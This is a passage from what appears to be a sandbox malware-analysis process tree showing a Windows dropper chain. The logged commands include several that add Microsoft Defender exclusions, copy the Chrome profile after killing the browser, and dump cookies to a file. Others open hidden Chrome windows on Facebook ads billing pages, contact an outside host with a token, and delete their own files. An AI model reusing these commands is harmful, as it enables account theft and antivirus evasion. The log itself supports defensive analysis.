"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mzhrc0dc.hdl\md7_7dfj.exe & exit
18⤵
PID:7732

C:\Users\Admin\AppData\Local\Temp\mzhrc0dc.hdl\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\mzhrc0dc.hdl\md7_7dfj.exe
19⤵
PID:7184

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exe & exit
18⤵
PID:6168

C:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exe
19⤵
PID:6272

C:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exe
20⤵
PID:9032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iqulossx.ej5\GcleanerWW.exe /mixone & exit
18⤵
PID:4552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bt4tg13y.s2d\setup.exe /8-2222 & exit
18⤵
PID:3408

C:\Users\Admin\AppData\Local\Temp\bt4tg13y.s2d\setup.exe
C:\Users\Admin\AppData\Local\Temp\bt4tg13y.s2d\setup.exe /8-2222
19⤵
PID:8652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Aged-Lake"
20⤵
PID:2032

C:\Program Files (x86)\Aged-Lake\7za.exe
"C:\Program Files (x86)\Aged-Lake\7za.exe" e -p154.61.71.13 winamp-plugins.7z
20⤵
PID:9220

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Aged-Lake\setup.exe" -map "C:\Program Files (x86)\Aged-Lake\WinmonProcessMonitor.sys""
20⤵
PID:7880

C:\Program Files (x86)\Aged-Lake\setup.exe
"C:\Program Files (x86)\Aged-Lake\setup.exe" -map "C:\Program Files (x86)\Aged-Lake\WinmonProcessMonitor.sys"
21⤵
PID:7396

C:\Program Files (x86)\Aged-Lake\7za.exe
"C:\Program Files (x86)\Aged-Lake\7za.exe" e -p154.61.71.13 winamp.7z
20⤵
PID:9408

C:\Program Files (x86)\Aged-Lake\setup.exe
"C:\Program Files (x86)\Aged-Lake\setup.exe" /8-2222
20⤵
PID:1532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\anznxmu5.45t\MultitimerFour.exe & exit
18⤵
PID:7636

C:\Users\Admin\AppData\Local\Temp\anznxmu5.45t\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\anznxmu5.45t\MultitimerFour.exe
19⤵
PID:6856

C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
20⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe" 1 3.1615300469.60478775cc348 104
21⤵
PID:7080

C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe" 2 3.1615300469.60478775cc348
22⤵
PID:9192

C:\Users\Admin\AppData\Local\Temp\ya5ww53wwpn\snpopyfjw11.exe
"C:\Users\Admin\AppData\Local\Temp\ya5ww53wwpn\snpopyfjw11.exe" /ustwo INSTALL
23⤵
PID:7636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "snpopyfjw11.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ya5ww53wwpn\snpopyfjw11.exe" & exit
24⤵
PID:5640

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "snpopyfjw11.exe" /f
25⤵
- Kills process with taskkill
PID:6964

C:\Users\Admin\AppData\Local\Temp\o2eah5pnczl\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\o2eah5pnczl\Setup3310.exe" /Verysilent /subid=577
23⤵
PID:9512

C:\Users\Admin\AppData\Local\Temp\is-145CE.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-145CE.tmp\Setup3310.tmp" /SL5="$507CE,802346,56832,C:\Users\Admin\AppData\Local\Temp\o2eah5pnczl\Setup3310.exe" /Verysilent /subid=577
24⤵
PID:7868

C:\Users\Admin\AppData\Local\Temp\is-I9313.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-I9313.tmp\Setup.exe" /Verysilent
25⤵
PID:9428

C:\Users\Admin\AppData\Local\Temp\is-UGM5K.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UGM5K.tmp\Setup.tmp" /SL5="$50506,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-I9313.tmp\Setup.exe" /Verysilent
26⤵
PID:7064

C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\PictureLAb.exe" /Verysilent
27⤵
PID:7668

C:\Users\Admin\AppData\Local\Temp\is-7EAJE.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7EAJE.tmp\PictureLAb.tmp" /SL5="$20950,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\PictureLAb.exe" /Verysilent
28⤵
PID:6568

C:\Users\Admin\AppData\Local\Temp\is-572J0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-572J0.tmp\Setup.exe" /VERYSILENT
29⤵
PID:9204

C:\Users\Admin\AppData\Local\Temp\is-D1FTF.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D1FTF.tmp\Setup.tmp" /SL5="$506D4,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-572J0.tmp\Setup.exe" /VERYSILENT
30⤵
PID:8856

C:\Users\Admin\AppData\Local\Temp\is-1KPAO.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-1KPAO.tmp\def.exe" /S /UID=lab214
31⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\48-c19d7-77b-a87b2-af6dc1c7df376\Cishihykagu.exe
"C:\Users\Admin\AppData\Local\Temp\48-c19d7-77b-a87b2-af6dc1c7df376\Cishihykagu.exe"
32⤵
PID:4228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rxt5x0bw.sxh\customer4.exe & exit
33⤵
PID:9708

C:\Users\Admin\AppData\Local\Temp\rxt5x0bw.sxh\customer4.exe
C:\Users\Admin\AppData\Local\Temp\rxt5x0bw.sxh\customer4.exe
34⤵
PID:8196

C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"
35⤵
PID:11240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\on22qgd3.3bg\askinstall18.exe & exit
33⤵
PID:5220

C:\Users\Admin\AppData\Local\Temp\on22qgd3.3bg\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\on22qgd3.3bg\askinstall18.exe
34⤵
PID:10732

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
35⤵
PID:7048

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
36⤵
- Kills process with taskkill
PID:11568

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y
35⤵
PID:11944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g1yef2gy.bms\md7_7dfj.exe & exit
33⤵
PID:10544

C:\Users\Admin\AppData\Local\Temp\g1yef2gy.bms\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\g1yef2gy.bms\md7_7dfj.exe
34⤵
PID:8644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exe & exit
33⤵
PID:10256

C:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exe
34⤵
PID:10916

C:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exe
35⤵
PID:12072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\borenl0y.p12\GcleanerWW.exe /mixone & exit
33⤵
PID:11128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2a25pug4.b0q\setup.exe /8-2222 & exit
33⤵
PID:10416

C:\Users\Admin\AppData\Local\Temp\2a25pug4.b0q\setup.exe
C:\Users\Admin\AppData\Local\Temp\2a25pug4.b0q\setup.exe /8-2222
34⤵
PID:5380

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Floral-Breeze"
35⤵
PID:13036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gcswsnug.3kj\MultitimerFour.exe & exit
33⤵
PID:10636

C:\Users\Admin\AppData\Local\Temp\gcswsnug.3kj\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\gcswsnug.3kj\MultitimerFour.exe
34⤵
PID:10084

C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\Delta.exe" /Verysilent
27⤵
PID:12052

C:\Users\Admin\AppData\Local\Temp\is-2G893.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2G893.tmp\Delta.tmp" /SL5="$60A78,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\Delta.exe" /Verysilent
28⤵
PID:10632

C:\Users\Admin\AppData\Local\Temp\is-JJ85M.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-JJ85M.tmp\Setup.exe" /VERYSILENT
29⤵
PID:12356

C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\zznote.exe" /Verysilent
27⤵
PID:12564

C:\Users\Admin\AppData\Local\Temp\is-H9UE4.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H9UE4.tmp\zznote.tmp" /SL5="$90802,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\zznote.exe" /Verysilent
28⤵
PID:12772

C:\Users\Admin\AppData\Local\Temp\5txl0paro5y\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\5txl0paro5y\askinstall24.exe"
23⤵
PID:5332

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
24⤵
PID:9652

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
25⤵
- Kills process with taskkill
PID:8768

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
24⤵
PID:1380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
24⤵
PID:7656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xd4,0x88,0x7ffe9b2e6e00,0x7ffe9b2e6e10,0x7ffe9b2e6e20
25⤵
PID:9940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1716 /prefetch:8
25⤵
PID:10276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:2
25⤵
PID:10268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2084 /prefetch:8
25⤵
PID:10288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
25⤵
PID:10520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1
25⤵
PID:10512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
25⤵
PID:10680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
25⤵
PID:10620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1616 /prefetch:1
25⤵
PID:10888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
25⤵
PID:11184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
25⤵
PID:11176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
25⤵
PID:11168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4944 /prefetch:8
25⤵
PID:11076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4952 /prefetch:8
25⤵
PID:9992

C:\Users\Admin\AppData\Local\Temp\clyd4rcs3kr\vict.exe
"C:\Users\Admin\AppData\Local\Temp\clyd4rcs3kr\vict.exe" /VERYSILENT /id=535
23⤵
PID:10148

C:\Users\Admin\AppData\Local\Temp\is-LAIKG.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LAIKG.tmp\vict.tmp" /SL5="$4044C,870426,780800,C:\Users\Admin\AppData\Local\Temp\clyd4rcs3kr\vict.exe" /VERYSILENT /id=535
24⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\is-F0TRN.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-F0TRN.tmp\wimapi.exe" 535
25⤵
PID:5204

C:\Users\Admin\AppData\Local\Temp\fuza45k1xup\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\fuza45k1xup\chashepro3.exe" /VERYSILENT
23⤵
PID:7904

C:\Users\Admin\AppData\Local\Temp\is-S9M39.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S9M39.tmp\chashepro3.tmp" /SL5="$4089C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\fuza45k1xup\chashepro3.exe" /VERYSILENT
24⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\21rb3lohyp2\app.exe
"C:\Users\Admin\AppData\Local\Temp\21rb3lohyp2\app.exe" /8-23
23⤵
PID:8992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Blue-Wind"
24⤵
PID:9420

C:\Program Files (x86)\Blue-Wind\7za.exe
"C:\Program Files (x86)\Blue-Wind\7za.exe" e -p154.61.71.13 winamp-plugins.7z
24⤵
PID:7192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Blue-Wind\app.exe" -map "C:\Program Files (x86)\Blue-Wind\WinmonProcessMonitor.sys""
24⤵
PID:6528

C:\Program Files (x86)\Blue-Wind\app.exe
"C:\Program Files (x86)\Blue-Wind\app.exe" -map "C:\Program Files (x86)\Blue-Wind\WinmonProcessMonitor.sys"
25⤵
PID:8576

C:\Program Files (x86)\Blue-Wind\7za.exe
"C:\Program Files (x86)\Blue-Wind\7za.exe" e -p154.61.71.13 winamp.7z
24⤵
PID:5632

C:\Program Files (x86)\Blue-Wind\app.exe
"C:\Program Files (x86)\Blue-Wind\app.exe" /8-23
24⤵
PID:9684

C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\Delta.exe" /Verysilent
12⤵
PID:6052

C:\Users\Admin\AppData\Local\Temp\is-QK9QK.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QK9QK.tmp\Delta.tmp" /SL5="$2081C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\Delta.exe" /Verysilent
13⤵
PID:6532

C:\Users\Admin\AppData\Local\Temp\is-P6JAD.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-P6JAD.tmp\Setup.exe" /VERYSILENT
14⤵
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 868
15⤵
- Program crash
PID:6308

C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\zznote.exe" /Verysilent
12⤵
PID:7836

C:\Users\Admin\AppData\Local\Temp\is-7LP7P.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7LP7P.tmp\zznote.tmp" /SL5="$50702,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\zznote.exe" /Verysilent
13⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\is-170ME.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-170ME.tmp\jg4_4jaa.exe" /silent
14⤵
PID:8784

C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:9520

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:9152

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:7772

C:\Users\Admin\AppData\Local\Temp\s1hgtx0lxq5\app.exe
"C:\Users\Admin\AppData\Local\Temp\s1hgtx0lxq5\app.exe" /8-23
8⤵
PID:5224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Crimson-Sky"
9⤵
PID:6140

C:\Program Files (x86)\Crimson-Sky\7za.exe
"C:\Program Files (x86)\Crimson-Sky\7za.exe" e -p154.61.71.13 winamp-plugins.7z
9⤵
PID:7428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Crimson-Sky\app.exe" -map "C:\Program Files (x86)\Crimson-Sky\WinmonProcessMonitor.sys""
9⤵
PID:4828

C:\Program Files (x86)\Crimson-Sky\app.exe
"C:\Program Files (x86)\Crimson-Sky\app.exe" -map "C:\Program Files (x86)\Crimson-Sky\WinmonProcessMonitor.sys"
10⤵
PID:5560

C:\Program Files (x86)\Crimson-Sky\7za.exe
"C:\Program Files (x86)\Crimson-Sky\7za.exe" e -p154.61.71.13 winamp.7z
9⤵
PID:7420

C:\Program Files (x86)\Crimson-Sky\app.exe
"C:\Program Files (x86)\Crimson-Sky\app.exe" /8-23
9⤵
PID:5056

C:\Users\Admin\AppData\Local\Temp\mmksqee2yit\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\mmksqee2yit\vpn.exe" /silent /subid=482
8⤵
PID:3764

C:\Users\Admin\AppData\Local\Temp\lzzvipu5pgx\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\lzzvipu5pgx\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
PID:3180

C:\Users\Admin\AppData\Local\Temp\is-HE8DP.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HE8DP.tmp\IBInstaller_97039.tmp" /SL5="$10410,14441882,721408,C:\Users\Admin\AppData\Local\Temp\lzzvipu5pgx\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
PID:5656

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
PID:6536

C:\Users\Admin\AppData\Local\Temp\is-SOMFO.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-SOMFO.tmp\{app}\chrome_proxy.exe"
10⤵
PID:6564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-SOMFO.tmp\{app}\chrome_proxy.exe"
11⤵
PID:8112

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:8088

C:\Users\Admin\AppData\Local\Temp\2jhjwmtiw2a\vict.exe
"C:\Users\Admin\AppData\Local\Temp\2jhjwmtiw2a\vict.exe" /VERYSILENT /id=535
8⤵
PID:684

C:\Users\Admin\AppData\Local\Temp\b4hgb2iyzsf\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\b4hgb2iyzsf\chashepro3.exe" /VERYSILENT
8⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\kvsrqcvcnsb\xgfilbww3ga.exe
"C:\Users\Admin\AppData\Local\Temp\kvsrqcvcnsb\xgfilbww3ga.exe" 57a764d042bf8
8⤵
PID:1140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\7IRHDTW1VM\7IRHDTW1V.exe" 57a764d042bf8 & exit
9⤵
PID:5260

C:\Program Files\7IRHDTW1VM\7IRHDTW1V.exe
"C:\Program Files\7IRHDTW1VM\7IRHDTW1V.exe" 57a764d042bf8
10⤵
PID:7276

C:\Users\Admin\AppData\Local\Temp\1no5jv3g2hd\oyljw44tzjq.exe
"C:\Users\Admin\AppData\Local\Temp\1no5jv3g2hd\oyljw44tzjq.exe" /ustwo INSTALL
8⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "oyljw44tzjq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1no5jv3g2hd\oyljw44tzjq.exe" & exit
9⤵
PID:5888

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "oyljw44tzjq.exe" /f
10⤵
- Kills process with taskkill
PID:6260

C:\Users\Admin\AppData\Local\Temp\psal1mdr0mx\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\psal1mdr0mx\askinstall24.exe"
8⤵
PID:3452

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:5840

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:6724

C:\Users\Admin\AppData\Local\Temp\w43zntj3k1a\2ih2gpjdgkv.exe
"C:\Users\Admin\AppData\Local\Temp\w43zntj3k1a\2ih2gpjdgkv.exe" testparams
8⤵
PID:1424

C:\Users\Admin\AppData\Roaming\kjvtqcmnmme\5rd3pvvvm00.exe
"C:\Users\Admin\AppData\Roaming\kjvtqcmnmme\5rd3pvvvm00.exe" /VERYSILENT /p=testparams
9⤵
PID:5172

C:\Users\Admin\AppData\Local\Temp\is-4OULE.tmp\5rd3pvvvm00.tmp
